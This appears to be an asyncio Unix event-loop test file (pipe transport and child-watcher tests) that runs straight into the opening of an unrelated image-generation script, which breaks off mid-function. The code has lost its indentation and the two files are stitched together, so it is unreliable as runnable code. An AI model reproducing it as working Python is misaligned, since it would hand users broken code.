tr = self.read_pipe_transport()
err = object()
tr._close(err)
self.assertTrue(tr.is_closing())
self.assertFalse(self.loop.readers)
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(err)
def test__call_connection_lost(self):
tr = self.read_pipe_transport()
self.assertIsNotNone(tr._protocol)
self.assertIsNotNone(tr._loop)
err = None
tr._call_connection_lost(err)
self.protocol.connection_lost.assert_called_with(err)
self.pipe.close.assert_called_with()
self.assertIsNone(tr._protocol)
self.assertIsNone(tr._loop)
def test__call_connection_lost_with_err(self):
tr = self.read_pipe_transport()
self.assertIsNotNone(tr._protocol)
self.assertIsNotNone(tr._loop)
err = OSError()
tr._call_connection_lost(err)
self.protocol.connection_lost.assert_called_with(err)
self.pipe.close.assert_called_with()
self.assertIsNone(tr._protocol)
self.assertIsNone(tr._loop)
class UnixWritePipeTransportTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = self.new_test_loop()
self.protocol = test_utils.make_test_protocol(asyncio.BaseProtocol)
self.pipe = mock.Mock(spec_set=io.RawIOBase)
self.pipe.fileno.return_value = 5
blocking_patcher = mock.patch('os.set_blocking')
blocking_patcher.start()
self.addCleanup(blocking_patcher.stop)
fstat_patcher = mock.patch('os.fstat')
m_fstat = fstat_patcher.start()
st = mock.Mock()
st.st_mode = stat.S_IFSOCK
m_fstat.return_value = st
self.addCleanup(fstat_patcher.stop)
def write_pipe_transport(self, waiter=None):
transport = unix_events._UnixWritePipeTransport(self.loop, self.pipe,
self.protocol,
waiter=waiter)
self.addCleanup(close_pipe_transport, transport)
return transport
def test_ctor(self):
waiter = asyncio.Future(loop=self.loop)
tr = self.write_pipe_transport(waiter=waiter)
self.loop.run_until_complete(waiter)
self.protocol.connection_made.assert_called_with(tr)
self.loop.assert_reader(5, tr._read_ready)
self.assertEqual(None, waiter.result())
def test_can_write_eof(self):
tr = self.write_pipe_transport()
self.assertTrue(tr.can_write_eof())
@mock.patch('os.write')
def test_write(self, m_write):
tr = self.write_pipe_transport()
m_write.return_value = 4
tr.write(b'data')
m_write.assert_called_with(5, b'data')
self.assertFalse(self.loop.writers)
self.assertEqual(bytearray(), tr._buffer)
@mock.patch('os.write')
def test_write_no_data(self, m_write):
tr = self.write_pipe_transport()
tr.write(b'')
self.assertFalse(m_write.called)
self.assertFalse(self.loop.writers)
self.assertEqual(bytearray(b''), tr._buffer)
@mock.patch('os.write')
def test_write_partial(self, m_write):
tr = self.write_pipe_transport()
m_write.return_value = 2
tr.write(b'data')
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'ta'), tr._buffer)
@mock.patch('os.write')
def test_write_buffer(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'previous')
tr.write(b'data')
self.assertFalse(m_write.called)
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'previousdata'), tr._buffer)
@mock.patch('os.write')
def test_write_again(self, m_write):
tr = self.write_pipe_transport()
m_write.side_effect = BlockingIOError()
tr.write(b'data')
m_write.assert_called_with(5, bytearray(b'data'))
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'data'), tr._buffer)
@mock.patch('asyncio.unix_events.logger')
@mock.patch('os.write')
def test_write_err(self, m_write, m_log):
tr = self.write_pipe_transport()
err = OSError()
m_write.side_effect = err
tr._fatal_error = mock.Mock()
tr.write(b'data')
m_write.assert_called_with(5, b'data')
self.assertFalse(self.loop.writers)
self.assertEqual(bytearray(), tr._buffer)
tr._fatal_error.assert_called_with(
err,
'Fatal write error on pipe transport')
self.assertEqual(1, tr._conn_lost)
tr.write(b'data')
self.assertEqual(2, tr._conn_lost)
tr.write(b'data')
tr.write(b'data')
tr.write(b'data')
tr.write(b'data')
# This is a bit overspecified. :-(
m_log.warning.assert_called_with(
'pipe closed by peer or os.write(pipe, data) raised exception.')
tr.close()
@mock.patch('os.write')
def test_write_close(self, m_write):
tr = self.write_pipe_transport()
tr._read_ready() # pipe was closed by peer
tr.write(b'data')
self.assertEqual(tr._conn_lost, 1)
tr.write(b'data')
self.assertEqual(tr._conn_lost, 2)
def test__read_ready(self):
tr = self.write_pipe_transport()
tr._read_ready()
self.assertFalse(self.loop.readers)
self.assertFalse(self.loop.writers)
self.assertTrue(tr.is_closing())
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(None)
@mock.patch('os.write')
def test__write_ready(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'data')
m_write.return_value = 4
tr._write_ready()
self.assertFalse(self.loop.writers)
self.assertEqual(bytearray(), tr._buffer)
@mock.patch('os.write')
def test__write_ready_partial(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'data')
m_write.return_value = 3
tr._write_ready()
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'a'), tr._buffer)
@mock.patch('os.write')
def test__write_ready_again(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'data')
m_write.side_effect = BlockingIOError()
tr._write_ready()
m_write.assert_called_with(5, bytearray(b'data'))
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'data'), tr._buffer)
@mock.patch('os.write')
def test__write_ready_empty(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'data')
m_write.return_value = 0
tr._write_ready()
m_write.assert_called_with(5, bytearray(b'data'))
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'data'), tr._buffer)
@mock.patch('asyncio.log.logger.error')
@mock.patch('os.write')
def test__write_ready_err(self, m_write, m_logexc):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'data')
m_write.side_effect = err = OSError()
tr._write_ready()
self.assertFalse(self.loop.writers)
self.assertFalse(self.loop.readers)
self.assertEqual(bytearray(), tr._buffer)
self.assertTrue(tr.is_closing())
m_logexc.assert_not_called()
self.assertEqual(1, tr._conn_lost)
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(err)
@mock.patch('os.write')
def test__write_ready_closing(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._closing = True
tr._buffer = bytearray(b'data')
m_write.return_value = 4
tr._write_ready()
self.assertFalse(self.loop.writers)
self.assertFalse(self.loop.readers)
self.assertEqual(bytearray(), tr._buffer)
self.protocol.connection_lost.assert_called_with(None)
self.pipe.close.assert_called_with()
@mock.patch('os.write')
def test_abort(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
self.loop.add_reader(5, tr._read_ready)
tr._buffer = [b'da', b'ta']
tr.abort()
self.assertFalse(m_write.called)
self.assertFalse(self.loop.readers)
self.assertFalse(self.loop.writers)
self.assertEqual([], tr._buffer)
self.assertTrue(tr.is_closing())
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(None)
def test__call_connection_lost(self):
tr = self.write_pipe_transport()
self.assertIsNotNone(tr._protocol)
self.assertIsNotNone(tr._loop)
err = None
tr._call_connection_lost(err)
self.protocol.connection_lost.assert_called_with(err)
self.pipe.close.assert_called_with()
self.assertIsNone(tr._protocol)
self.assertIsNone(tr._loop)
def test__call_connection_lost_with_err(self):
tr = self.write_pipe_transport()
self.assertIsNotNone(tr._protocol)
self.assertIsNotNone(tr._loop)
err = OSError()
tr._call_connection_lost(err)
self.protocol.connection_lost.assert_called_with(err)
self.pipe.close.assert_called_with()
self.assertIsNone(tr._protocol)
self.assertIsNone(tr._loop)
def test_close(self):
tr = self.write_pipe_transport()
tr.write_eof = mock.Mock()
tr.close()
tr.write_eof.assert_called_with()
# closing the transport twice must not fail
tr.close()
def test_close_closing(self):
tr = self.write_pipe_transport()
tr.write_eof = mock.Mock()
tr._closing = True
tr.close()
self.assertFalse(tr.write_eof.called)
def test_write_eof(self):
tr = self.write_pipe_transport()
tr.write_eof()
self.assertTrue(tr.is_closing())
self.assertFalse(self.loop.readers)
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(None)
def test_write_eof_pending(self):
tr = self.write_pipe_transport()
tr._buffer = [b'data']
tr.write_eof()
self.assertTrue(tr.is_closing())
self.assertFalse(self.protocol.connection_lost.called)
class AbstractChildWatcherTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
watcher = asyncio.AbstractChildWatcher()
self.assertRaises(
NotImplementedError, watcher.add_child_handler, f, f)
self.assertRaises(
NotImplementedError, watcher.remove_child_handler, f)
self.assertRaises(
NotImplementedError, watcher.attach_loop, f)
self.assertRaises(
NotImplementedError, watcher.close)
self.assertRaises(
NotImplementedError, watcher.is_active)
self.assertRaises(
NotImplementedError, watcher.__enter__)
self.assertRaises(
NotImplementedError, watcher.__exit__, f, f, f)
class BaseChildWatcherTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
watcher = unix_events.BaseChildWatcher()
self.assertRaises(
NotImplementedError, watcher._do_waitpid, f)
WaitPidMocks = collections.namedtuple("WaitPidMocks",
("waitpid",
"WIFEXITED",
"WIFSIGNALED",
"WEXITSTATUS",
"WTERMSIG",
))
class ChildWatcherTestsMixin:
ignore_warnings = mock.patch.object(log.logger, "warning")
def setUp(self):
super().setUp()
self.loop = self.new_test_loop()
self.running = False
self.zombies = {}
with mock.patch.object(
self.loop, "add_signal_handler") as self.m_add_signal_handler:
self.watcher = self.create_watcher()
self.watcher.attach_loop(self.loop)
def waitpid(self, pid, flags):
if isinstance(self.watcher, asyncio.SafeChildWatcher) or pid != -1:
self.assertGreater(pid, 0)
try:
if pid < 0:
return self.zombies.popitem()
else:
return pid, self.zombies.pop(pid)
except KeyError:
pass
if self.running:
return 0, 0
else:
raise ChildProcessError()
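    # Fake status encoding used by these tests: a normal exit with code r is
    # stored as r + 32768, and death by signal s (added as returncode -s)
    # becomes 32768 - s.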
def add_zombie(self, pid, returncode):
self.zombies[pid] = returncode + 32768
def WIFEXITED(self, status):
return status >= 32768
def WIFSIGNALED(self, status):
return 32700 < status < 32768
def WEXITSTATUS(self, status):
self.assertTrue(self.WIFEXITED(status))
return status - 32768
def WTERMSIG(self, status):
self.assertTrue(self.WIFSIGNALED(status))
return 32768 - status
def test_create_watcher(self):
self.m_add_signal_handler.assert_called_once_with(
signal.SIGCHLD, self.watcher._sig_chld)
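    # Decorator that patches os.waitpid and the WIF*/W* status macros with the
    # fake implementations defined above and passes the mocks to the test.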
def waitpid_mocks(func):
def wrapped_func(self):
def patch(target, wrapper):
return mock.patch(target, wraps=wrapper,
new_callable=mock.Mock)
with patch('os.WTERMSIG', self.WTERMSIG) as m_WTERMSIG, \
patch('os.WEXITSTATUS', self.WEXITSTATUS) as m_WEXITSTATUS, \
patch('os.WIFSIGNALED', self.WIFSIGNALED) as m_WIFSIGNALED, \
patch('os.WIFEXITED', self.WIFEXITED) as m_WIFEXITED, \
patch('os.waitpid', self.waitpid) as m_waitpid:
func(self, WaitPidMocks(m_waitpid,
m_WIFEXITED, m_WIFSIGNALED,
m_WEXITSTATUS, m_WTERMSIG,
))
return wrapped_func
@waitpid_mocks
def test_sigchld(self, m):
# register a child
callback = mock.Mock()
with self.watcher:
self.running = True
self.watcher.add_child_handler(42, callback, 9, 10, 14)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child is running
self.watcher._sig_chld()
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child terminates (returncode 12)
self.running = False
self.add_zombie(42, 12)
self.watcher._sig_chld()
self.assertTrue(m.WIFEXITED.called)
self.assertTrue(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
callback.assert_called_once_with(42, 12, 9, 10, 14)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WEXITSTATUS.reset_mock()
callback.reset_mock()
# ensure that the child is effectively reaped
self.add_zombie(42, 13)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback.called)
self.assertFalse(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WEXITSTATUS.reset_mock()
# sigchld called again
self.zombies.clear()
self.watcher._sig_chld()
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
@waitpid_mocks
def test_sigchld_two_children(self, m):
callback1 = mock.Mock()
callback2 = mock.Mock()
# register child 1
with self.watcher:
self.running = True
self.watcher.add_child_handler(43, callback1, 7, 8)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# register child 2
with self.watcher:
self.watcher.add_child_handler(44, callback2, 147, 18)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# children are running
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child 1 terminates (signal 3)
self.add_zombie(43, -3)
self.watcher._sig_chld()
callback1.assert_called_once_with(43, -3, 7, 8)
self.assertFalse(callback2.called)
self.assertTrue(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertTrue(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WTERMSIG.reset_mock()
callback1.reset_mock()
# child 2 still running
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child 2 terminates (code 108)
self.add_zombie(44, 108)
self.running = False
self.watcher._sig_chld()
callback2.assert_called_once_with(44, 108, 147, 18)
self.assertFalse(callback1.called)
self.assertTrue(m.WIFEXITED.called)
self.assertTrue(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WEXITSTATUS.reset_mock()
callback2.reset_mock()
# ensure that the children are effectively reaped
self.add_zombie(43, 14)
self.add_zombie(44, 15)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WEXITSTATUS.reset_mock()
# sigchld called again
self.zombies.clear()
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
@waitpid_mocks
def test_sigchld_two_children_terminating_together(self, m):
callback1 = mock.Mock()
callback2 = mock.Mock()
# register child 1
with self.watcher:
self.running = True
self.watcher.add_child_handler(45, callback1, 17, 8)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# register child 2
with self.watcher:
self.watcher.add_child_handler(46, callback2, 1147, 18)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# children are running
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child 1 terminates (code 78)
# child 2 terminates (signal 5)
self.add_zombie(45, 78)
self.add_zombie(46, -5)
self.running = False
self.watcher._sig_chld()
callback1.assert_called_once_with(45, 78, 17, 8)
callback2.assert_called_once_with(46, -5, 1147, 18)
self.assertTrue(m.WIFSIGNALED.called)
self.assertTrue(m.WIFEXITED.called)
self.assertTrue(m.WEXITSTATUS.called)
self.assertTrue(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WTERMSIG.reset_mock()
m.WEXITSTATUS.reset_mock()
callback1.reset_mock()
callback2.reset_mock()
# ensure that the children are effectively reaped
self.add_zombie(45, 14)
self.add_zombie(46, 15)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WTERMSIG.called)
@waitpid_mocks
def test_sigchld_race_condition(self, m):
# register a child
callback = mock.Mock()
with self.watcher:
# child terminates before being registered
self.add_zombie(50, 4)
self.watcher._sig_chld()
self.watcher.add_child_handler(50, callback, 1, 12)
callback.assert_called_once_with(50, 4, 1, 12)
callback.reset_mock()
# ensure that the child is effectively reaped
self.add_zombie(50, -1)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback.called)
@waitpid_mocks
def test_sigchld_replace_handler(self, m):
callback1 = mock.Mock()
callback2 = mock.Mock()
# register a child
with self.watcher:
self.running = True
self.watcher.add_child_handler(51, callback1, 19)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# register the same child again
with self.watcher:
self.watcher.add_child_handler(51, callback2, 21)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child terminates (signal 8)
self.running = False
self.add_zombie(51, -8)
self.watcher._sig_chld()
callback2.assert_called_once_with(51, -8, 21)
self.assertFalse(callback1.called)
self.assertTrue(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertTrue(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WTERMSIG.reset_mock()
callback2.reset_mock()
# ensure that the child is effectively reaped
self.add_zombie(51, 13)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WTERMSIG.called)
@waitpid_mocks
def test_sigchld_remove_handler(self, m):
callback = mock.Mock()
# register a child
with self.watcher:
self.running = True
self.watcher.add_child_handler(52, callback, 1984)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# unregister the child
self.watcher.remove_child_handler(52)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child terminates (code 99)
self.running = False
self.add_zombie(52, 99)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback.called)
@waitpid_mocks
def test_sigchld_unknown_status(self, m):
callback = mock.Mock()
# register a child
with self.watcher:
self.running = True
self.watcher.add_child_handler(53, callback, -19)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# terminate with unknown status
self.zombies[53] = 1178
self.running = False
self.watcher._sig_chld()
callback.assert_called_once_with(53, 1178, -19)
self.assertTrue(m.WIFEXITED.called)
self.assertTrue(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
callback.reset_mock()
m.WIFEXITED.reset_mock()
m.WIFSIGNALED.reset_mock()
# ensure that the child is effectively reaped
self.add_zombie(53, 101)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback.called)
@waitpid_mocks
def test_remove_child_handler(self, m):
callback1 = mock.Mock()
callback2 = mock.Mock()
callback3 = mock.Mock()
# register children
with self.watcher:
self.running = True
self.watcher.add_child_handler(54, callback1, 1)
self.watcher.add_child_handler(55, callback2, 2)
self.watcher.add_child_handler(56, callback3, 3)
# remove child handler 1
self.assertTrue(self.watcher.remove_child_handler(54))
# remove child handler 2 multiple times
self.assertTrue(self.watcher.remove_child_handler(55))
self.assertFalse(self.watcher.remove_child_handler(55))
self.assertFalse(self.watcher.remove_child_handler(55))
# all children terminate
self.add_zombie(54, 0)
self.add_zombie(55, 1)
self.add_zombie(56, 2)
self.running = False
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
callback3.assert_called_once_with(56, 2, 3)
@waitpid_mocks
def test_sigchld_unhandled_exception(self, m):
callback = mock.Mock()
# register a child
with self.watcher:
self.running = True
self.watcher.add_child_handler(57, callback)
# raise an exception
m.waitpid.side_effect = ValueError
with mock.patch.object(log.logger,
'error') as m_error:
self.assertEqual(self.watcher._sig_chld(), None)
self.assertTrue(m_error.called)
@waitpid_mocks
def test_sigchld_child_reaped_elsewhere(self, m):
# register a child
callback = mock.Mock()
with self.watcher:
self.running = True
self.watcher.add_child_handler(58, callback)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child terminates
self.running = False
self.add_zombie(58, 4)
# waitpid is called elsewhere
os.waitpid(58, os.WNOHANG)
m.waitpid.reset_mock()
# sigchld
with self.ignore_warnings:
self.watcher._sig_chld()
if isinstance(self.watcher, asyncio.FastChildWatcher):
            # here the FastChildWatcher enters a deadlock
# (there is no way to prevent it)
self.assertFalse(callback.called)
else:
callback.assert_called_once_with(58, 255)
@waitpid_mocks
def test_sigchld_unknown_pid_during_registration(self, m):
# register two children
callback1 = mock.Mock()
callback2 = mock.Mock()
with self.ignore_warnings, self.watcher:
self.running = True
# child 1 terminates
self.add_zombie(591, 7)
# an unknown child terminates
self.add_zombie(593, 17)
self.watcher._sig_chld()
self.watcher.add_child_handler(591, callback1)
self.watcher.add_child_handler(592, callback2)
callback1.assert_called_once_with(591, 7)
self.assertFalse(callback2.called)
@waitpid_mocks
def test_set_loop(self, m):
# register a child
callback = mock.Mock()
with self.watcher:
self.running = True
self.watcher.add_child_handler(60, callback)
# attach a new loop
old_loop = self.loop
self.loop = self.new_test_loop()
patch = mock.patch.object
with patch(old_loop, "remove_signal_handler") as m_old_remove, \
patch(self.loop, "add_signal_handler") as m_new_add:
self.watcher.attach_loop(self.loop)
m_old_remove.assert_called_once_with(
signal.SIGCHLD)
m_new_add.assert_called_once_with(
signal.SIGCHLD, self.watcher._sig_chld)
# child terminates
self.running = False
self.add_zombie(60, 9)
self.watcher._sig_chld()
callback.assert_called_once_with(60, 9)
@waitpid_mocks
def test_set_loop_race_condition(self, m):
# register 3 children
callback1 = mock.Mock()
callback2 = mock.Mock()
callback3 = mock.Mock()
with self.watcher:
self.running = True
self.watcher.add_child_handler(61, callback1)
self.watcher.add_child_handler(62, callback2)
self.watcher.add_child_handler(622, callback3)
# detach the loop
old_loop = self.loop
self.loop = None
with mock.patch.object(
old_loop, "remove_signal_handler") as m_remove_signal_handler:
with self.assertWarnsRegex(
RuntimeWarning, 'A loop is being detached'):
self.watcher.attach_loop(None)
m_remove_signal_handler.assert_called_once_with(
signal.SIGCHLD)
# child 1 & 2 terminate
self.add_zombie(61, 11)
self.add_zombie(62, -5)
# SIGCHLD was not caught
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(callback3.called)
# attach a new loop
self.loop = self.new_test_loop()
with mock.patch.object(
self.loop, "add_signal_handler") as m_add_signal_handler:
self.watcher.attach_loop(self.loop)
m_add_signal_handler.assert_called_once_with(
signal.SIGCHLD, self.watcher._sig_chld)
callback1.assert_called_once_with(61, 11) # race condition!
callback2.assert_called_once_with(62, -5) # race condition!
self.assertFalse(callback3.called)
callback1.reset_mock()
callback2.reset_mock()
# child 3 terminates
self.running = False
self.add_zombie(622, 19)
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
callback3.assert_called_once_with(622, 19)
@waitpid_mocks
def test_close(self, m):
# register two children
callback1 = mock.Mock()
with self.watcher:
self.running = True
# child 1 terminates
self.add_zombie(63, 9)
# other child terminates
self.add_zombie(65, 18)
self.watcher._sig_chld()
self.watcher.add_child_handler(63, callback1)
self.watcher.add_child_handler(64, callback1)
self.assertEqual(len(self.watcher._callbacks), 1)
if isinstance(self.watcher, asyncio.FastChildWatcher):
self.assertEqual(len(self.watcher._zombies), 1)
with mock.patch.object(
self.loop,
"remove_signal_handler") as m_remove_signal_handler:
self.watcher.close()
m_remove_signal_handler.assert_called_once_with(
signal.SIGCHLD)
self.assertFalse(self.watcher._callbacks)
if isinstance(self.watcher, asyncio.FastChildWatcher):
self.assertFalse(self.watcher._zombies)
class SafeChildWatcherTests(ChildWatcherTestsMixin, test_utils.TestCase):
    def create_watcher(self):
        return asyncio.SafeChildWatcher()
class FastChildWatcherTests(ChildWatcherTestsMixin, test_utils.TestCase):
def create_watcher(self):
return asyncio.FastChildWatcher()
class PolicyTests(unittest.TestCase):
def create_policy(self):
return asyncio.DefaultEventLoopPolicy()
def test_get_default_child_watcher(self):
policy = self.create_policy()
self.assertIsNone(policy._watcher)
watcher = policy.get_child_watcher()
self.assertIsInstance(watcher, asyncio.ThreadedChildWatcher)
self.assertIs(policy._watcher, watcher)
self.assertIs(watcher, policy.get_child_watcher())
def test_get_child_watcher_after_set(self):
policy = self.create_policy()
watcher = asyncio.FastChildWatcher()
policy.set_child_watcher(watcher)
self.assertIs(policy._watcher, watcher)
self.assertIs(watcher, policy.get_child_watcher())
def test_get_child_watcher_thread(self):
def f():
policy.set_event_loop(policy.new_event_loop())
self.assertIsInstance(policy.get_event_loop(),
asyncio.AbstractEventLoop)
watcher = policy.get_child_watcher()
self.assertIsInstance(watcher, asyncio.SafeChildWatcher)
self.assertIsNone(watcher._loop)
policy.get_event_loop().close()
policy = self.create_policy()
policy.set_child_watcher(asyncio.SafeChildWatcher())
th = threading.Thread(target=f)
th.start()
th.join()
def test_child_watcher_replace_mainloop_existing(self):
policy = self.create_policy()
loop = policy.get_event_loop()
# Explicitly setup SafeChildWatcher,
# default ThreadedChildWatcher has no _loop property
watcher = asyncio.SafeChildWatcher()
policy.set_child_watcher(watcher)
watcher.attach_loop(loop)
self.assertIs(watcher._loop, loop)
new_loop = policy.new_event_loop()
policy.set_event_loop(new_loop)
self.assertIs(watcher._loop, new_loop)
policy.set_event_loop(None)
self.assertIs(watcher._loop, None)
loop.close()
new_loop.close()
class TestFunctional(unittest.TestCase):
def setUp(self):
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
def tearDown(self):
self.loop.close()
asyncio.set_event_loop(None)
def test_add_reader_invalid_argument(self):
def assert_raises():
return self.assertRaisesRegex(ValueError, r'Invalid file object')
cb = lambda: None
with assert_raises():
self.loop.add_reader(object(), cb)
with assert_raises():
self.loop.add_writer(object(), cb)
with assert_raises():
self.loop.remove_reader(object())
with assert_raises():
self.loop.remove_writer(object())
def test_add_reader_or_writer_transport_fd(self):
def assert_raises():
return self.assertRaisesRegex(
RuntimeError,
r'File descriptor .* is used by transport')
async def runner():
tr, pr = await self.loop.create_connection(
lambda: asyncio.Protocol(), sock=rsock)
try:
cb = lambda: None
with assert_raises():
self.loop.add_reader(rsock, cb)
with assert_raises():
self.loop.add_reader(rsock.fileno(), cb)
with assert_raises():
self.loop.remove_reader(rsock)
with assert_raises():
self.loop.remove_reader(rsock.fileno())
with assert_raises():
self.loop.add_writer(rsock, cb)
with assert_raises():
self.loop.add_writer(rsock.fileno(), cb)
with assert_raises():
self.loop.remove_writer(rsock)
with assert_raises():
self.loop.remove_writer(rsock.fileno())
finally:
tr.close()
rsock, wsock = socket.socketpair()
try:
self.loop.run_until_complete(runner())
finally:
rsock.close()
wsock.close()
if __name__ == '__main__':
unittest.main()
|
image_generator.py
|
import os
import json
from PIL import Image
from colorama import Fore, Back, Style
import colorama
import command
import gentle
from bar import print_bar
import copy
import threading
threads = []
class LockingCounter():
def __init__(self):
self.lock = threading.Lock()
self.count = 0
def increment(self):
with self.lock:
self.count += 1
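# Shared counter of frames written so far; worker threads increment it and the
# main thread polls it to drive the progress bar.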
q = LockingCounter()
verbose = False
characters = ''
num_phonemes = 1
def init(phones):
global num_phonemes
num_phonemes = phones
colorama.init(convert=True)
def v_out(log):
if verbose:
print(log)
def progress_bar(frames_completed):
print_bar(frames_completed, num_phonemes, "Generating Images: ")
def get_face_path(pose):
split_pose = pose[1:-1].split('-')
